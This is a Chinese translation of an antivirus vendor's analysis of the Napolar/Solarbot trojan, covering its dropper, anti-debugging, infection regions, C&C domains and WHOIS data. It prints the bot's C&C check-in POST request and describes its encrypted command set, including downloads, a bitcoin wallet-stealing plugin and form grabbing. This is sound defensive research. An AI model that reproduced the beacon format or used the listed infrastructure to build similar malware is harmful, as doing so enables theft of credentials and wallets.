摘要：為了了解被這種木馬感染的地區(qū)分布情況，我們分析了相關(guān)檢測(cè)部分的運(yùn)行狀況。受到感染影響最嚴(yán)重的區(qū)域?yàn)橹心厦赖母鐐惐葋單瘍?nèi)瑞拉秘魯墨西哥阿根廷以及亞洲的菲利賓越南和歐洲的波蘭。通信協(xié)議目前發(fā)現(xiàn)的服務(wù)器有。響應(yīng)結(jié)構(gòu)采用以分割的字符串?dāng)?shù)組的形式。

在最近幾個(gè)星期里的AVAST惡意樣本分析名單中，Win32/64:Napolar擁有極高的文件和網(wǎng)絡(luò)屏蔽率。另外，我們發(fā)現(xiàn)了被冠以Solarbot名稱的新型木馬于2013年5月左右開始做出其相關(guān)宣傳廣告，而這種廣告并沒有發(fā)布在大家經(jīng)常訪問的黑客論壇，而是在由主流搜索引擎索引的一個(gè)叫solarbot.net的網(wǎng)站，它擁有一個(gè)非常專業(yè)的外觀設(shè)計(jì)。

對(duì)于Win32/64:Napolar木馬，它的進(jìn)程間通信管道名稱是.pipe apSolar。再加上存在的類似“CHROME.DLL”、“OPERA.DLL”、“trusteer”、“data_inject”等字符串，以及后面會(huì)提到的功能特征，因此我們確定它和Solarbot間存在某種關(guān)聯(lián)。讓我們來看看下面的分析。

該文件最初以自解壓的壓縮文件形式存在，以類似Photo_021-WWW.FACEBOOK.COM.exe這樣的格式命名，并執(zhí)行2項(xiàng)工作：靜默執(zhí)行dropper以及展示類似下面的辣妹照片（譯者注：馬賽克是人類文明進(jìn)步最大的絆腳石）：

作者的聲明中宣稱Solarbot由Free?Pascal的Lazarus?IDE所編寫，但我們想不出任何專業(yè)或者商業(yè)性質(zhì)的木馬有此類似特點(diǎn)。從另一個(gè)角度來講，我們不能確定該代碼是否用Free?Pascal編寫的，因?yàn)樗黀E頭部的許多信息都不同于一般的用Free?Pascal編譯的二進(jìn)制文件。

核心可執(zhí)行文件的結(jié)構(gòu)如下：

x86初始的部分，同時(shí)也用于識(shí)別系統(tǒng)的體系結(jié)構(gòu)。而在64位系統(tǒng)中，還有一個(gè)通信模塊被解壓和加載。LDE64（長(zhǎng)度反匯編引擎）是一個(gè)32位基于BeaEngine下的官方工具，它能夠進(jìn)行32位和64位架構(gòu)指令解碼。對(duì)于系統(tǒng)函數(shù)的修改來說反匯編工作必不可少（確保成功的掛鉤一個(gè)定制的或模擬的源代碼塊）。

如網(wǎng)站廣告中提到的，KERNEL32.DLL、NTDLL.DLL、WININET.DLL、SHLWAPI.DLL、PASPI.DLL中的所有重要函數(shù)都進(jìn)行了CRC32哈希處理（CRC32哈希常數(shù)表結(jié)構(gòu)地址在0xFF395A）并將其儲(chǔ)存在虛擬表單中。與IsDebuggerPresent、OutputDebugString函數(shù)相關(guān)的反調(diào)試技巧也在此有所體現(xiàn)。安裝到%AppDatalsass.exe后，在新申請(qǐng)的內(nèi)存空間0xFE0000處開始運(yùn)行，之后bot會(huì)自行關(guān)閉，這意味著它不會(huì)在進(jìn)程列表中被發(fā)現(xiàn)。

為了了解被這種木馬感染的地區(qū)分布情況，我們分析了相關(guān)檢測(cè)部分的運(yùn)行狀況。結(jié)果表明，每天至少有幾百臺(tái)計(jì)算機(jī)被感染，而這個(gè)數(shù)字相對(duì)于全部Solarbot樣本來講數(shù)量略多。受到感染影響最嚴(yán)重的區(qū)域?yàn)橹心厦赖母鐐惐葋?、委?nèi)瑞拉、秘魯、墨西哥、阿根廷以及亞洲的菲利賓、越南和歐洲的波蘭。

目前發(fā)現(xiàn)的C&C服務(wù)器有：xyz25.com、cmeef.info、paloshke.org。而后者注冊(cè)于臭名昭著的Bizcn.com公司。我們?cè)诓┛椭刑岬降囊豢钐摷傩迯?fù)工具即注冊(cè)在這家具有欺詐性質(zhì)的中國(guó)注冊(cè)商下。廣告站solarbot.net的注冊(cè)信息如下：

Domain Name: SOLARBOT.NET
 Registrar: NETEARTH ONE INC. D/B/A NETEARTH
 Whois Server: whois.advancedregistrar.com
 Referral URL: http://www.advancedregistrar.com
 Name Server: NS1.BITCOIN-DNS.COM
 Name Server: NS2.BITCOIN-DNS.COM
 Status: clientTransferProhibited
 Updated Date: 01-aug-2013
 Creation Date: 01-aug-2013
 Expiration Date: 01-aug-2014

注冊(cè)數(shù)據(jù)中聯(lián)系信息被隱藏在PRIVACYPROTECT.ORG后面，它吸引了眾多的涉及惡意活動(dòng)的團(tuán)體。

獲取執(zhí)行命令的HTTP?POST請(qǐng)求如下所示：

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR
3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.paloshke.org
Content-Length: 81
Pragma: no-cache

v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32

其中s字符表示一個(gè)從受害人環(huán)境獲取的，隨之生成的RC4解密密匙，v代表bot的版本，數(shù)字1.0表示這個(gè)bot的初始開發(fā)階段。

在成功的請(qǐng)求了之后，會(huì)得到響應(yīng)。就像我們所提到的那樣，它是由RC4進(jìn)行加密的，通過POST查詢字段發(fā)送未加密的正確密鑰。響應(yīng)結(jié)構(gòu)采用以0分割的字符串?dāng)?shù)組的形式。每個(gè)字符串開頭使用一個(gè)字節(jié)來表示指令號(hào)碼（已觀察到15個(gè)不同的指令），再加上相應(yīng)的字符串：在連接延遲（指令0xC）中是秒數(shù)（一般為3600）；對(duì)于下載命令（指令0×12），是文件的URL地址、控制哈希以及一個(gè)解密密鑰；0×2指令安裝額外的文件WalletSteal.bin，一個(gè)比特幣錢包的偷竊插件。根據(jù)bitcoin.org，比特幣錢包就相當(dāng)于比特幣網(wǎng)絡(luò)中的實(shí)體錢包，它包含有允許用戶在比特幣交易中使用的密鑰。實(shí)際上，這就是之前說的關(guān)于插件支持的例子。插件加密放在%AppData中的臨時(shí)目錄SlrPlugin中。

以下特點(diǎn)列表就是在網(wǎng)站上所展示的：

我們已看到FTP和POP3掠奪，反向Socks5或者基礎(chǔ)功能模塊的實(shí)現(xiàn)。有相關(guān)的字符串（“SSL”、“http://”、“https://”、web瀏覽器庫的名字、“NSS?layer”、“data_start”、“data_inject”、“data_end”）反映了從瀏覽器發(fā)起攻擊的可能性。確實(shí)，我們發(fā)現(xiàn)網(wǎng)絡(luò)銀行論壇的內(nèi)容以未加密的方法發(fā)送到C&C服務(wù)器上，但這僅在網(wǎng)站要求信譽(yù)或者證書驗(yàn)證時(shí)發(fā)生。這可能和以下內(nèi)置的URL列表有關(guān)：

https://urs.microsoft.com/urs.asmx

http://ocsp.verisign.com

http://ocsp.comodoca.com

http://safebrowsing.clients.google.com

http://dirpop.naver.com:8088/search.naver

而后通過內(nèi)部指令0xF進(jìn)行遠(yuǎn)程更新。

接下來我們觀察到，它下載了一個(gè)比特幣挖掘機(jī)，并將其注入到系統(tǒng)臨時(shí)目錄的記事本文件中進(jìn)行了執(zhí)行（對(duì)應(yīng)列表中的“MD5版本更新和系統(tǒng)下載”）。

最后，我們不得不說這個(gè)bot所展示的強(qiáng)悍的惡意能力，再加上$200的合理價(jià)格，近期很有可能大量涌現(xiàn)。幸運(yùn)的是，針對(duì)此的反病毒軟件將會(huì)應(yīng)運(yùn)而生，使這些網(wǎng)絡(luò)犯罪種類更加的難以生存。

原文 Win32/64:Napolar: New Trojan shines on the cyber crime-scene
翻譯 IDF實(shí)驗(yàn)室 李天星